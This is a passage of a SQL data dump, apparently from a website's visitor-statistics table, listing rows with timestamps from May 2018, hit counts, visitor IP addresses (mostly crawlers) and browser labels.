5',''),(240941,1525587760,1,1,0,0,'66.249.70.25','chrome'),(240942,1525587764,1,1,0,0,'66.249.64.29','chrome'),(240943,1525587901,1,1,0,0,'207.46.13.217','other'),(240944,1525588237,1,1,0,0,'54.36.148.229','other'),(240945,1525588345,1,1,0,0,'87.250.224.46','other'),(240946,1525588475,1,1,0,0,'54.36.148.163','other'),(240947,1525588531,1,1,0,0,'54.36.149.8','other'),(240948,1525588642,1,1,0,0,'54.36.149.105','other'),(240949,1525588683,3,3,0,0,'216.244.66.237','other'),(240950,1525588775,1,1,0,0,'54.36.148.245','other'),(240951,1525589015,1,1,0,0,'54.36.148.146','other'),(240952,1525589517,1,1,0,0,'54.36.148.21','other'),(240953,1525589580,1,1,0,0,'54.36.148.122','other'),(240954,1525589726,1,0,1,0,'66.249.64.30',''),(240955,1525589758,1,1,0,0,'54.36.149.97','other'),(240956,1525589816,1,1,0,0,'54.36.148.90','other'),(240957,1525589853,1,1,0,0,'37.9.113.182','other'),(240958,1525590054,1,1,0,0,'54.36.148.11','other'),(240959,1525590082,1,1,0,0,'54.36.148.128','other'),(240960,1525590108,1,1,0,0,'54.36.148.116','other'),(240961,1525590347,1,1,0,0,'54.36.149.84','other'),(240962,1525590952,1,1,0,0,'54.36.148.140','other'),(240963,1525591081,1,1,0,0,'54.36.148.74','other'),(240964,1525591252,1,0,1,0,'66.249.64.29',''),(240965,1525591297,1,1,0,0,'54.36.148.253','other'),(240966,1525591349,1,1,0,0,'163.172.4.153','chrome'),(240967,1525591640,1,1,0,0,'216.244.66.237','other'),(240968,1525591686,2,2,0,0,'95.213.141.126','opera'),(240969,1525592070,1,1,0,0,'54.36.149.82','other'),(240970,1525592139,1,1,0,0,'54.36.149.5','other'),(240971,1525592224,1,1,0,0,'54.36.149.93','other'),(240972,1525592704,3,3,0,0,'216.244.66.237','other'),(240973,1525592705,1,1,0,0,'8.29.198.25','other'),(240974,1525592828,1,0,1,0,'66.249.64.28',''),(240975,1525592860,1,1,0,0,'54.36.148.251','other'),(240976,1525593265,1,1,0,0,'66.249.64.29','chrome'),(240977,1525593539,1,1,0,0,'54.36.148.144','other'),(240978,1525593714,1,1,0,0,'54.36.149.48','other'),(240979,1525593723,1,1,0,0,'54.36.148.247','other'),(240980,1525593746,1,1,0,0,'54.36.148.224','other'),(240981,1525593941,1,1,0,0,'54.36.149.96','other'),(240982,1525594076,1,1,0,0,'54.36.148.139','other'),(240983,1525594381,4,4,0,0,'216.244.66.237','other'),(240984,1525594652,1,1,0,0,'141.8.142.74','other'),(240985,1525594852,1,1,0,0,'54.36.148.98','other'),(240986,1525595048,1,1,0,0,'54.36.149.89','other'),(240987,1525595154,1,1,0,0,'178.154.171.88','other'),(240988,1525595165,1,1,0,0,'54.36.148.105','other'),(240989,1525595204,1,0,1,0,'66.249.64.29',''),(240990,1525595299,1,1,0,0,'54.36.149.98','other'),(240991,1525595355,1,1,0,0,'54.36.148.170','other'),(240992,1525595514,1,1,0,0,'54.36.148.61','other'),(240993,1525595566,1,1,0,0,'54.36.148.39','other'),(240994,1525595765,1,1,0,0,'54.36.148.219','other'),(240995,1525596104,1,1,0,0,'54.36.148.174','other'),(240996,1525596206,1,1,0,0,'66.249.64.28','chrome'),(240997,1525596315,1,1,0,0,'54.36.148.100','other'),(240998,1525596507,1,1,0,0,'54.36.148.223','other'),(240999,1525596886,2,2,0,0,'141.8.142.74','other'),(241000,1525596958,1,1,0,0,'54.36.149.1','other'),(241001,1525597049,1,1,0,0,'54.36.148.126','other'),(241002,1525597978,1,1,0,0,'8.29.198.26','other'),(241003,1525598301,1,1,0,0,'157.55.39.74','other'),(241004,1525598361,1,1,0,0,'54.36.148.40','other'),(241005,1525598413,1,1,0,0,'54.36.149.64','other'),(241006,1525598486,1,1,0,0,'141.8.142.167','other'),(241007,1525598783,1,1,0,0,'54.36.148.16','other'),(241008,1525598846,1,1,0,0,'216.244.66.237','other'),(241009,1525598880,1,1,0,0,'54.36.148.157','other'),(241010,1525599028,1,1,0,0,'54.36.148.198','other'),(241011,1525599125,1,1,0,0,'54.36.148.137','other'),(241012,1525599432,1,1,0,0,'54.36.148.146','other'),(241013,1525599576,1,1,0,0,'54.36.148.222','other'),(241014,1525599759,1,1,0,0,'91.214.209.229','chrome'),(241015,1525599855,1,1,0,0,'178.255.215.94','other'),(241016,1525600074,1,1,0,0,'54.36.149.29','other'),(241017,1525600931,1,1,0,0,'207.46.13.50','other'),(241018,1525601202,1,1,0,0,'54.36.148.219','other'),(241019,1525601204,1,1,0,0,'54.36.148.173','other'),(241020,1525601958,1,1,0,0,'54.36.148.51','other'),(241021,1525602150,1,1,0,0,'66.249.64.30','chrome'),(241022,1525602401,1,1,0,0,'54.36.149.54','other'),(241023,1525602788,1,1,0,0,'54.36.149.107','other'),(241024,1525602844,1,1,0,0,'178.154.200.7','other'),(241025,1525602894,2,2,0,0,'216.244.66.237','other'),(241026,1525603024,1,1,0,0,'178.154.200.41','other'),(241027,1525603191,1,0,1,0,'66.249.64.29',''),(241028,1525603269,1,1,0,0,'54.36.149.9','other'),(241029,1525603540,1,1,0,0,'8.29.198.25','other'),(241030,1525603625,1,1,0,0,'54.36.149.56','other'),(241031,1525603817,1,1,0,0,'54.36.148.92','other'),(241032,1525603917,3,3,0,0,'216.244.66.237','other'),(241033,1525603951,1,1,0,0,'54.36.148.185','other'),(241034,1525604091,1,1,0,0,'54.36.148.40','other'),(241035,1525604330,1,1,0,0,'54.36.148.45','other'),(241036,1525604532,1,1,0,0,'54.36.149.77','other'),(241037,1525604836,1,1,0,0,'54.36.148.100','other'),(241038,1525604945,1,0,1,0,'66.249.70.29',''),(241039,1525604952,1,1,0,0,'66.249.70.25','chrome'),(241040,1525604985,1,1,0,0,'54.36.148.203','other'),(241041,1525605012,1,0,1,0,'66.249.64.29',''),(241042,1525605038,1,1,0,0,'54.36.148.115','other'),(241043,1525605219,1,1,0,0,'54.36.148.129','other'),(241044,1525605227,1,1,0,0,'54.36.148.222','other'),(241045,1525605270,1,1,0,0,'54.36.148.190','other'),(241046,1525605389,1,1,0,0,'54.36.148.37','other'),(241047,1525605523,1,1,0,0,'54.36.148.249','other'),(241048,1525605615,1,0,1,0,'66.249.64.30',''),(241049,1525605869,1,1,0,0,'54.36.149.52','other'),(241050,1525605875,1,1,0,0,'54.36.148.148','other'),(241051,1525606626,1,1,0,0,'91.196.178.134','chrome'),(241052,1525606667,1,0,1,0,'66.249.64.30',''),(241053,1525606863,1,1,0,0,'54.36.149.76','other'),(241054,1525606937,1,1,0,0,'54.36.148.140','other'),(241055,1525607065,1,1,0,0,'95.108.213.24','other'),(241056,1525607202,1,1,0,0,'178.154.200.45','other'),(241057,1525607217,1,1,0,0,'54.36.148.221','other'),(241058,1525607336,1,1,0,0,'54.36.148.146','other'),(241059,1525607527,2,2,0,0,'216.244.66.237','other'),(241060,1525607552,1,1,0,0,'54.36.148.118','other'),(241061,1525607600,1,1,0,0,'178.154.200.41','other'),(241062,1525607649,1,1,0,0,'54.36.149.45','other'),(241063,1525607653,1,1,0,0,'54.36.148.81','other'),(241064,1525607663,1,1,0,0,'54.36.149.94','other'),(241065,1525608050,3,3,0,0,'46.70.115.64','firefox'),(241066,1525608068,1,1,0,0,'54.36.149.37','other'),(241067,1525608304,1,1,0,0,'178.154.200.45','other'),(241068,1525608379,1,1,0,0,'54.36.149.58','other'),(241069,1525608441,2,2,0,0,'216.244.66.237','other'),(241070,1525608551,1,1,0,0,'54.36.149.60','other'),(241071,1525608617,1,1,0,0,'54.36.148.98','other'),(241072,1525608807,1,1,0,0,'8.29.198.25','other'),(241073,1525609075,1,1,0,0,'162.210.196.98','other'),(241074,1525609442,1,1,0,0,'54.36.149.90','other'),(241075,1525609449,1,1,0,0,'180.76.15.155','other'),(241076,1525609560,1,1,0,0,'54.36.148.147','other'),(241077,1525609926,1,1,0,0,'128.75.111.244','msie'),(241078,1525609978,1,1,0,0,'54.36.148.105','other'),(241079,1525610001,1,1,0,0,'37.9.113.74','other'),(241080,1525610571,1,1,0,0,'87.250.224.66','other'),(241081,1525610574,1,1,0,0,'141.8.142.50','other'),(241082,1525610603,1,1,0,0,'178.154.200.45','other'),(241083,1525610676,1,1,0,0,'5.45.207.49','other'),(241084,1525610919,1,1,0,0,'54.36.148.84','other'),(241085,1525611050,1,1,0,0,'54.36.148.206','other'),(241086,1525611301,1,1,0,0,'54.36.148.193','other'),(241087,1525611475,1,0,1,0,'66.249.64.29',''),(241088,1525611666,1,1,0,0,'54.36.149.46','other'),(241089,1525612083,1,1,0,0,'87.250.224.46','other'),(241090,1525612218,1,1,0,0,'66.249.64.29','chrome'),(241091,1525612376,1,1,0,0,'66.249.70.29','chrome'),(241092,1525612405,2,2,0,0,'216.244.66.237','other'),(241093,1525612464,1,1,0,0,'54.36.148.246','other'),(241094,1525612602,1,1,0,0,'54.36.148.27','other'),(241095,1525612617,1,1,0,0,'213.174.11.41','chrome'),(241096,1525612966,1,1,0,0,'54.36.148.184','other'),(241097,1525613254,1,1,0,0,'54.36.148.17','other'),(241098,1525613284,1,1,0,0,'54.36.148.249','other'),(241099,1525613321,1,1,0,0,'54.36.149.69','other'),(241100,1525614006,3,3,0,0,'91.196.178.163','chrome'),(241101,1525614188,1,1,0,0,'180.76.15.163','other'),(241102,1525614227,1,1,0,0,'141.8.142.134','other'),(241103,1525614379,1,1,0,0,'8.29.198.27','other'),(241104,1525614880,1,1,0,0,'178.154.171.88','other'),(241105,1525615003,1,1,0,0,'54.36.148.26','other'),(241106,1525615050,1,1,0,0,'54.36.149.18','other'),(241107,1525615434,1,1,0,0,'54.36.148.163','other'),(241108,1525615645,1,1,0,0,'54.36.148.130','other'),(241109,1525615740,1,1,0,0,'95.135.213.166','chrome'),(241110,1525615858,1,1,0,0,'82.145.223.13','chrome'),(241111,1525616024,1,1,0,0,'54.36.149.8','other'),(241112,1525616068,1,1,0,0,'54.36.148.83','other'),(241113,1525616185,1,0,1,0,'66.249.64.28',''),(241114,1525616489,1,1,0,0,'37.9.113.151','other'),(241115,1525616493,2,2,0,0,'216.244.66.237','other'),(241116,1525616544,1,1,0,0,'54.36.148.158','other'),(241117,1525617233,1,1,0,0,'54.36.148.254','other'),(241118,1525617342,1,1,0,0,'178.154.200.8','other'),(241119,1525617528,1,1,0,0,'54.36.149.93','other'),(241120,1525617930,1,1,0,0,'54.36.148.22','other'),(241121,1525618727,1,1,0,0,'54.36.148.20','other'),(241122,1525618745,1,1,0,0,'54.36.148.143','other'),(241123,1525618790,1,1,0,0,'54.36.149.82','other'),(241124,1525618813,2,0,2,0,'66.249.64.29',''),(241125,1525618986,1,1,0,0,'54.36.148.160','other'),(241126,1525619278,1,0,1,0,'66.249.70.27',''),(241127,1525619428,1,1,0,0,'54.36.148.203','other'),(241128,1525619610,1,1,0,0,'66.249.64.29','chrome'),(241129,1525619644,1,1,0,0,'8.29.198.26','other'),(241130,1525619696,1,1,0,0,'66.249.70.27','chrome'),(241131,1525620129,1,1,0,0,'93.76.11.3','chrome'),(241132,1525620259,1,1,0,0,'141.8.142.96','other'),(241133,1525620587,1,1,0,0,'91.196.178.167','chrome'),(241134,1525620612,1,1,0,0,'54.36.148.95','other'),(241135,1525620632,1,1,0,0,'54.36.148.153','other'),(241136,1525620733,1,1,0,0,'54.36.148.90','other'),(241137,1525620741,1,1,0,0,'188.230.43.254','other'),(241138,1525620860,1,1,0,0,'54.36.149.77','other'),(241139,1525621207,1,1,0,0,'95.108.213.24','other'),(241140,1525621391,1,1,0,0,'54.36.148.226','other'),(241141,1525621606,1,1,0,0,'54.36.148.10','other'),(241142,1525621633,1,1,0,0,'54.36.149.15','other'),(241143,1525621755,1,1,0,0,'54.36.148.168','other'),(241144,1525622303,1,1,0,0,'54.36.148.184','other'),(241145,1525622510,1,1,0,0,'216.244.66.237','other'),(241146,1525622753,1,1,0,0,'157.55.39.74','other'),(241147,1525622790,1,1,0,0,'54.36.149.52','other'),(241148,1525622904,1,1,0,0,'54.36.148.24','other'),(241149,1525622908,1,1,0,0,'54.36.148.126','other'),(241150,1525623145,1,1,0,0,'188.230.43.254','other'),(241151,1525623264,1,1,0,0,'54.36.148.21','other'),(241152,1525623751,1,1,0,0,'54.36.148.192','other'),(241153,1525624231,1,1,0,0,'54.36.149.44','other'),(241154,1525624374,1,1,0,0,'54.36.149.52','other'),(241155,1525624620,1,1,0,0,'54.36.149.53','other'),(241156,1525624721,1,1,0,0,'141.8.142.29','other'),(241157,1525624724,1,1,0,0,'87.250.224.96','other'),(241158,1525625200,1,1,0,0,'8.29.198.25','other'),(241159,1525625548,1,1,0,0,'188.230.43.254','other'),(241160,1525625979,1,1,0,0,'54.36.148.139','other'),(241161,1525626013,1,1,0,0,'54.36.148.102','other'),(241162,1525626028,1,1,0,0,'54.36.148.126','other'),(241163,1525626101,1,0,1,0,'66.249.64.29',''),(241164,1525626258,1,1,0,0,'54.36.148.84','other'),(241165,1525626387,1,0,1,0,'66.249.64.30',''),(241166,1525626493,1,0,1,0,'66.249.70.27',''),(241167,1525626513,1,1,0,0,'54.36.148.66','other'),(241168,1525626615,1,1,0,0,'54.36.148.101','other'),(241169,1525626617,1,1,0,0,'37.9.113.115','other'),(241170,1525626640,1,1,0,0,'54.36.148.113','other'),(241171,1525626669,1,1,0,0,'66.249.64.29','chrome'),(241172,1525626722,1,1,0,0,'66.249.70.27','chrome'),(241173,1525626732,1,1,0,0,'54.36.148.107','other'),(241174,1525626833,1,1,0,0,'178.154.200.28','other'),(241175,1525626836,1,1,0,0,'37.9.113.134','other'),(241176,1525627071,1,1,0,0,'54.36.149.84','other'),(241177,1525627077,1,1,0,0,'54.36.148.228','other'),(241178,1525627085,1,1,0,0,'141.8.142.29','other'),(241179,1525627385,1,1,0,0,'207.46.13.50','other'),(241180,1525627433,1,1,0,0,'54.36.148.245','other'),(241181,1525627716,1,1,0,0,'54.36.149.95','other'),(241182,1525627847,1,1,0,0,'54.36.148.128','other'),(241183,1525627870,1,1,0,0,'54.36.148.102','other'),(241184,1525627941,1,1,0,0,'54.36.148.229','other'),(241185,1525627955,1,1,0,0,'37.9.113.138','other'),(241186,1525628153,1,1,0,0,'216.244.66.237','other'),(241187,1525628481,1,1,0,0,'54.36.148.255','other'),(241188,1525628629,1,1,0,0,'91.209.11.236','other'),(241189,1525628944,1,0,1,0,'66.249.64.28',''),(241190,1525629083,1,1,0,0,'54.36.148.47','other'),(241191,1525629142,2,2,0,0,'207.46.13.50','other'),(241192,1525629352,1,1,0,0,'54.36.148.171','other'),(241193,1525629415,1,1,0,0,'216.244.66.237','other'),(241194,1525629978,1,1,0,0,'54.36.149.80','other'),(241195,1525629997,1,1,0,0,'54.36.148.20','other'),(241196,1525630311,1,1,0,0,'54.36.148.77','other'),(241197,1525630469,1,1,0,0,'8.29.198.25','other'),(241198,1525631124,1,1,0,0,'54.36.148.199','other'),(241199,1525631252,1,0,1,0,'66.249.70.27',''),(241200,1525631465,1,1,0,0,'54.36.148.238','other'),(241201,1525631797,1,1,0,0,'66.249.70.29','chrome'),(241202,1525631813,1,1,0,0,'46.161.9.39','chrome'),(241203,1525631911,1,1,0,0,'54.36.149.29','other'),(241204,1525632287,1,1,0,0,'216.244.66.237','other'),(241205,1525632440,1,1,0,0,'54.36.148.195','other'),(241206,1525632456,1,1,0,0,'193.106.30.99','firefox'),(241207,1525632538,1,1,0,0,'54.36.148.249','other'),(241208,1525632582,1,1,0,0,'54.36.149.14','other'),(241209,1525632769,1,1,0,0,'54.36.149.95','other'),(241210,1525632884,1,1,0,0,'54.36.148.25','other'),(241211,1525633008,1,1,0,0,'54.36.149.54','other'),(241212,1525633070,1,1,0,0,'54.36.148.69','other'),(241213,1525633173,1,1,0,0,'54.36.148.45','other'),(241214,1525633374,1,1,0,0,'54.36.148.141','other'),(241215,1525633573,1,1,0,0,'207.46.13.50','other'),(241216,1525633605,1,1,0,0,'87.250.224.66','other'),(241217,1525633642,1,1,0,0,'31.43.7.84','chrome'),(241218,1525633678,1,0,1,0,'66.249.64.28',''),(241219,1525633871,1,0,1,0,'66.249.70.25',''),(241220,1525633913,1,1,0,0,'54.36.149.86','other'),(241221,1525633945,1,1,0,0,'66.249.64.28','chrome'),(241222,1525633960,1,1,0,0,'66.249.70.25','chrome'),(241223,1525634121,1,1,0,0,'54.36.148.91','other'),(241224,1525634241,1,1,0,0,'54.36.148.103','other'),(241225,1525634605,1,1,0,0,'54.36.148.201','other'),(241226,1525634723,1,1,0,0,'54.36.149.95','other'),(241227,1525634887,1,0,1,0,'66.249.64.29',''),(241228,1525635203,1,1,0,0,'54.36.149.29','other'),(241229,1525635221,1,1,0,0,'37.73.203.69','chrome'),(241230,1525635316,1,1,0,0,'216.244.66.237','other'),(241231,1525635367,2,2,0,0,'178.92.171.183','chrome'),(241232,1525635455,1,1,0,0,'54.36.148.119','other'),(241233,1525635846,1,1,0,0,'46.211.106.2','chrome'),(241234,1525635933,1,0,1,0,'66.249.64.28',''),(241235,1525636028,1,1,0,0,'8.29.198.25','other'),(241236,1525636176,1,1,0,0,'54.36.148.98','other'),(241237,1525636183,1,1,0,0,'54.36.148.248','other'),(241238,1525636442,1,1,0,0,'54.36.148.58','other'),(241239,1525636482,1,1,0,0,'54.36.148.244','other'),(241240,1525636604,1,1,0,0,'54.36.149.25','other'),(241241,1525636699,1,1,0,0,'54.36.148.152','other'),(241242,1525636904,1,1,0,0,'54.36.149.59','other'),(241243,1525637103,1,1,0,0,'54.36.149.94','other'),(241244,1525637150,1,0,1,0,'66.249.64.30',''),(241245,1525637193,1,1,0,0,'54.36.149.15','other'),(241246,1525637270,1,1,0,0,'54.36.148.46','other'),(241247,1525637399,1,1,0,0,'54.36.148.50','other'),(241248,1525637512,1,1,0,0,'195.114.121.73','chrome'),(241249,1525637884,1,1,0,0,'54.36.149.95','other'),(241250,1525637911,1,1,0,0,'54.36.148.72','other'),(241251,1525638616,1,1,0,0,'54.36.148.240','other'),(241252,1525639253,1,1,0,0,'37.9.113.186','other'),(241253,1525639307,1,1,0,0,'54.36.149.69','other'),(241254,1525639338,1,1,0,0,'54.36.149.22','other'),(241255,1525639500,1,1,0,0,'54.36.148.182','other'),(241256,1525639600,1,1,0,0,'54.36.148.43','other'),(241257,1525639668,1,1,0,0,'54.36.148.114','other'),(241258,1525639979,2,2,0,0,'195.10.210.49','chrome'),(241259,1525639983,1,1,0,0,'54.36.148.127','other'),(241260,1525640033,1,1,0,0,'54.36.148.162','other'),(241261,1525640132,1,1,0,0,'54.36.148.14','other'),(241262,1525640315,1,1,0,0,'54.36.149.107','other'),(241263,1525640334,1,1,0,0,'207.46.13.217','other'),(241264,1525640448,1,1,0,0,'66.249.70.27','chrome'),(241265,1525640667,1,1,0,0,'54.36.149.17','other'),(241266,1525640898,1,1,0,0,'54.36.149.64','other'),(241267,1525641028,1,1,0,0,'54.36.148.211','other'),(241268,1525641089,1,1,0,0,'37.9.113.186','other'),(241269,1525641121,1,1,0,0,'54.36.148.30','other'),(241270,1525641163,1,1,0,0,'54.36.148.92','other'),(241271,1525641193,1,1,0,0,'54.36.149.4','other'),(241272,1525641300,1,1,0,0,'8.29.198.26','other'),(241273,1525641434,1,1,0,0,'54.36.148.127','other'),(241274,1525641930,1,1,0,0,'54.36.148.228','other'),(241275,1525641968,1,1,0,0,'54.36.148.196','other'),(241276,1525641975,1,1,0,0,'54.36.148.175','other'),(241277,1525642419,1,1,0,0,'54.36.148.193','other'),(241278,1525642802,1,1,0,0,'66.249.64.29','chrome'),(241279,1525642819,1,1,0,0,'54.36.148.179','other'),(241280,1525642866,1,1,0,0,'66.249.70.27','chrome'),(241281,1525642881,1,0,1,0,'66.249.70.25',''),(241282,1525642913,1,1,0,0,'54.36.148.132','other'),(241283,1525643088,1,1,0,0,'54.36.148.197','other'),(241284,1525643279,1,1,0,0,'216.244.66.237','other'),(241285,1525643583,1,1,0,0,'54.36.148.97','other'),(241286,1525643733,1,1,0,0,'54.36.149.16','other'),(241287,1525643772,1,1,0,0,'66.249.70.29','chrome'),(241288,1525643802,1,1,0,0,'54.36.148.242','other'),(241289,1525643923,1,1,0,0,'54.36.148.192','other'),(241290,1525643935,1,1,0,0,'54.36.149.98','other'),(241291,1525644009,1,1,0,0,'80.252.155.198','chrome'),(241292,1525644073,1,1,0,0,'193.106.30.99','firefox'),(241293,1525644147,1,1,0,0,'54.36.148.71','other'),(241294,1525644590,1,0,1,0,'66.249.64.30',''),(241295,1525644685,1,1,0,0,'54.36.148.113','other'),(241296,1525644701,3,3,0,0,'216.244.66.237','other'),(241297,1525644781,1,1,0,0,'54.36.148.54','other'),(241298,1525644793,1,1,0,0,'40.77.167.62','other'),(241299,1525644872,1,1,0,0,'54.36.149.46','other'),(241300,1525644949,1,1,0,0,'54.36.149.75','other'),(241301,1525644966,1,1,0,0,'54.36.148.237','other'),(241302,1525645050,1,1,0,0,'54.36.148.95','other'),(241303,1525645302,1,1,0,0,'54.36.148.184','other'),(241304,1525645378,1,1,0,0,'141.8.142.134','other'),(241305,1525645528,1,1,0,0,'54.36.148.40','other'),(241306,1525645764,1,1,0,0,'54.36.148.144','other'),(241307,1525645952,1,1,0,0,'54.36.148.211','other'),(241308,1525645986,1,1,0,0,'54.36.148.119','other'),(241309,1525646010,1,1,0,0,'54.36.148.165','other'),(241310,1525646050,1,1,0,0,'54.36.149.13','other'),(241311,1525646282,1,1,0,0,'37.9.113.186','other'),(241312,1525646581,1,1,0,0,'54.36.149.61','other'),(241313,1525646598,1,0,1,0,'66.249.64.28',''),(241314,1525646656,1,1,0,0,'54.36.148.95','other'),(241315,1525646863,1,1,0,0,'8.29.198.27','other'),(241316,1525646897,1,1,0,0,'163.172.67.180','other'),(241317,1525646953,1,1,0,0,'54.36.148.105','other'),(241318,1525646985,1,1,0,0,'54.36.148.50','other'),(241319,1525646988,1,1,0,0,'54.36.149.29','other'),(241320,1525647067,1,1,0,0,'54.36.148.12','other'),(241321,1525647234,1,1,0,0,'37.9.113.82','other'),(241322,1525647577,2,2,0,0,'216.244.66.237','other'),(241323,1525647678,1,1,0,0,'54.36.148.214','other'),(241324,1525648153,1,1,0,0,'54.36.148.153','other'),(241325,1525648305,1,1,0,0,'54.36.149.20','other'),(241326,1525648401,1,1,0,0,'54.36.148.87','other'),(241327,1525648692,1,1,0,0,'180.76.15.144','other'),(241328,1525648808,1,1,0,0,'54.36.148.161','other'),(241329,1525648810,1,1,0,0,'54.36.148.241','other'),(241330,1525649000,1,1,0,0,'54.36.148.64','other'),(241331,1525649093,1,1,0,0,'54.67.59.131','chrome'),(241332,1525649231,1,1,0,0,'54.36.148.253','other'),(241333,1525649521,1,1,0,0,'207.46.13.50','other'),(241334,1525649527,1,1,0,0,'141.8.142.134','other'),(241335,1525649816,1,1,0,0,'54.36.149.30','other'),(241336,1525649827,1,1,0,0,'66.249.70.25','chrome'),(241337,1525649861,1,1,0,0,'66.249.64.30','chrome'),(241338,1525649935,1,1,0,0,'54.36.149.62','other'),(241339,1525649949,1,1,0,0,'54.36.148.46','other'),(241340,1525649971,1,1,0,0,'54.36.148.57','other'),(241341,1525650123,1,1,0,0,'216.244.66.237','other'),(241342,1525650350,1,1,0,0,'54.36.148.209','other'),(241343,1525650434,1,1,0,0,'54.36.149.69','other'),(241344,1525650494,1,1,0,0,'54.36.149.80','other'),(241345,1525650724,1,0,1,0,'66.249.64.28',''),(241346,1525650807,1,1,0,0,'54.36.149.33','other'),(241347,1525650900,1,1,0,0,'37.9.113.186','other'),(241348,1525650975,1,1,0,0,'54.36.148.152','other'),(241349,1525651060,1,1,0,0,'54.36.149.63','other'),(241350,1525651652,1,1,0,0,'207.46.13.50','other'),(241351,1525651676,1,1,0,0,'54.36.148.22','other'),(241352,1525651786,1,1,0,0,'54.36.149.5','other'),(241353,1525651854,1,1,0,0,'54.36.148.16','other'),(241354,1525651924,1,1,0,0,'216.244.66.237','other'),(241355,1525651955,1,1,0,0,'87.250.224.96','other'),(241356,1525652137,1,1,0,0,'8.29.198.26','other'),(241357,1525652338,1,1,0,0,'54.36.148.56','other'),(241358,1525652403,1,1,0,0,'54.36.148.176','other'),(241359,1525652676,1,0,1,0,'66.249.64.30',''),(241360,1525652777,1,1,0,0,'54.36.148.37','other'),(241361,1525652933,1,1,0,0,'54.36.149.94','other'),(241362,1525653278,1,1,0,0,'54.36.148.179','other'),(241363,1525653382,1,1,0,0,'178.154.200.41','other'),(241364,1525653844,1,1,0,0,'54.36.148.104','other'),(241365,1525654107,1,1,0,0,'54.36.149.105','other'),(241366,1525654344,1,1,0,0,'178.154.200.28','other'),(241367,1525654375,1,1,0,0,'54.36.148.239','other'),(241368,1525654446,1,1,0,0,'54.36.148.196','other'),(241369,1525654721,1,1,0,0,'193.106.30.99','firefox'),(241370,1525654814,1,1,0,0,'216.244.66.237','other'),(241371,1525655002,1,1,0,0,'54.36.149.39','other'),(241372,1525655221,1,1,0,0,'87.250.224.96','other'),(241373,1525655426,1,1,0,0,'54.36.148.242','other'),(241374,1525655627,3,3,0,0,'54.36.148.194','other'),(241375,1525655768,1,1,0,0,'216.244.66.237','other'),(241376,1525655882,1,1,0,0,'54.36.148.143','other'),(241377,1525655913,1,0,1,0,'66.249.64.30',''),(241378,1525655941,1,1,0,0,'54.36.149.78','other'),(241379,1525656293,1,1,0,0,'54.36.148.121','other'),(241380,1525656586,1,1,0,0,'54.36.148.55','other'),(241381,1525656829,1,1,0,0,'54.36.148.222','other'),(241382,1525657206,1,0,1,0,'66.249.64.28',''),(241383,1525657415,1,0,1,0,'66.249.70.25',''),(241384,1525657439,1,1,0,0,'216.244.66.237','other'),(241385,1525657470,1,1,0,0,'54.36.149.80','other'),(241386,1525657472,1,1,0,0,'54.36.148.139','other'),(241387,1525657692,1,1,0,0,'8.29.198.27','other'),(241388,1525657867,1,1,0,0,'54.36.149.101','other'),(241389,1525657887,1,1,0,0,'66.249.64.28','chrome'),(241390,1525658121,1,1,0,0,'66.249.70.25','chrome'),(241391,1525658589,1,1,0,0,'54.36.148.206','other'),(241392,1525659486,1,1,0,0,'54.36.148.81','other'),(241393,1525659910,1,1,0,0,'54.36.148.93','other'),(241394,1525660181,1,1,0,0,'178.154.200.8','other'),(241395,1525660218,1,1,0,0,'5.45.207.49','other'),(241396,1525660448,1,1,0,0,'54.36.148.102','other'),(241397,1525660470,1,1,0,0,'54.36.148.23','other'),(241398,1525660656,1,1,0,0,'54.36.148.22','other'),(241399,1525660768,1,1,0,0,'54.36.148.247','other'),(241400,1525660769,1,1,0,0,'54.36.148.80','other'),(241401,1525661411,1,0,1,0,'66.249.64.29',''),(241402,1525661422,1,1,0,0,'216.244.66.237','other'),(241403,1525661672,1,1,0,0,'54.36.148.130','other'),(241404,1525662232,1,1,0,0,'54.36.148.59','other'),(241405,1525662329,1,1,0,0,'54.36.148.239','other'),(241406,1525662746,1,1,0,0,'141.8.142.134','other'),(241407,1525662961,1,1,0,0,'8.29.198.25','other'),(241408,1525663194,1,1,0,0,'54.36.148.30','other'),(241409,1525663427,1,1,0,0,'178.154.200.41','other'),(241410,1525663501,1,1,0,0,'54.36.149.27','other'),(241411,1525663931,1,1,0,0,'54.36.149.3','other'),(241412,1525664038,1,1,0,0,'216.244.66.237','other'),(241413,1525664068,1,1,0,0,'54.36.148.83','other'),(241414,1525664222,1,1,0,0,'54.36.148.181','other'),(241415,1525664434,1,1,0,0,'54.36.148.115','other'),(241416,1525665154,1,1,0,0,'54.36.148.163','other'),(241417,1525665626,1,1,0,0,'54.36.148.39','other'),(241418,1525665676,1,1,0,0,'54.36.149.64','other'),(241419,1525665859,1,1,0,0,'54.36.149.20','other'),(241420,1525666021,1,1,0,0,'37.9.113.82','other'),(241421,1525666325,1,1,0,0,'54.36.148.218','other'),(241422,1525666554,1,1,0,0,'54.36.148.138','other'),(241423,1525666716,1,1,0,0,'54.36.148.91','other'),(241424,1525666729,1,1,0,0,'54.36.149.56','other'),(241425,1525666976,1,1,0,0,'54.36.149.77','other'),(241426,1525667687,1,1,0,0,'54.36.149.65','other'),(241427,1525667931,1,1,0,0,'54.36.148.140','other'),(241428,1525667986,1,1,0,0,'54.36.148.51','other'),(241429,1525668086,1,1,0,0,'54.36.148.122','other'),(241430,1525668513,1,1,0,0,'8.29.198.27','other'),(241431,1525668532,1,1,0,0,'54.36.149.72','other'),(241432,1525669087,1,1,0,0,'54.36.148.133','other'),(241433,1525669181,1,1,0,0,'54.36.148.142','other'),(241434,1525669331,1,1,0,0,'37.9.113.132','other'),(241435,1525669537,1,1,0,0,'180.76.15.14','other'),(241436,1525669583,1,1,0,0,'54.36.149.40','other'),(241437,1525669894,1,1,0,0,'54.36.149.84','other'),(241438,1525670118,1,1,0,0,'54.36.148.100','other'),(241439,1525670163,1,1,0,0,'92.112.17.27','chrome'),(241440,1525670317,1,1,0,0,'54.36.148.238','other'),(241441,1525670363,2,2,0,0,'54.36.148.217','other'),(241442,1525671591,1,1,0,0,'54.36.149.27','other'),(241443,1525671749,1,1,0,0,'54.36.148.112','other'),(241444,1525672058,1,1,0,0,'216.244.66.237','other'),(241445,1525672105,1,1,0,0,'54.36.148.249','other'),(241446,1525672225,1,1,0,0,'54.36.148.63','other'),(241447,1525672503,1,1,0,0,'37.55.56.67','chrome'),(241448,1525672519,1,1,0,0,'54.36.149.67','other'),(241449,1525672682,1,1,0,0,'54.36.149.81','other'),(241450,1525672821,1,1,0,0,'54.36.148.65','other'),(241451,1525673001,1,1,0,0,'141.8.142.96','other'),(241452,1525673063,1,1,0,0,'54.36.148.243','other'),(241453,1525673133,1,1,0,0,'54.36.149.44','other'),(241454,1525673310,1,1,0,0,'54.36.148.150','other'),(241455,1525673322,1,1,0,0,'37.55.191.115'